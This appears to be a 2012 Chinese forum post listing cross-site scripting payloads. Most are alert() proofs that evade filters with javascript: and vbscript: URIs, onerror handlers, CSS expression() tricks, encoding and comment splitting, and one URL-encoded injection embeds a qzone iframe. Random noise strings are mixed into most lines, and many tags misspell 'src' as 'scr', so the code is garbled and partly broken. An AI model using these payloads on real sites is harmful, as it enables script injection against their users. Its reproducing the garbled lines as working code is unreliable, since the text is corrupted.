<script>alert("跨站")</script> (最常用)
1 j) X8 r4 S2 G4 @! D" M$ {7 L<img scr=javascript:alert("跨站")></img># ^2 ^9 ]" S; N) k& N
<img scr="javascript: alert(/跨站/)></img>5 j. Y( v' o1 [9 i4 B P4 F7 i
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
1 G1 A- U- Y7 \9 r0 R6 {2 R$ X<img scr="#" onerror=alert(/跨站/)></img>
% U. I$ n* h* B" d' x4 ~<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 W5 \, ~; y' J, {; e5 L& Y6 E( V<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)" |; {! ^% p/ q
<img src=vbscript:msgbox ("xss")></img>2 Y* z3 \' F( w3 t; _
<style> input {left:expression (alert('xss'))}</style>
2 s- ^+ B+ J6 I9 Y; J/ o1 @<div style={left:expression (alert('xss'))}></div>& F% o- Y/ J5 y, x- i7 P. ^
<div style={left:exp/* */ression (alert('xss'))}></div>
7 n* S. S, N" o C: G" |3 E<div style={left:\0065\0078ression (alert('xss'))}></div>& R* J- m" T) Y# w
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>5 A" M7 [9 o! ?2 y
unicode <div style="{left:expRessioN (alert('xss'))}">
E$ G# P( j3 N3 a' Z" w" r1 R! Q7 K% j# l0 f3 |# i$ P+ _
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>[") a: h* y5 x- I. W4 M
|
发表于 2012-9-13 17:15:04
收藏
支持
反对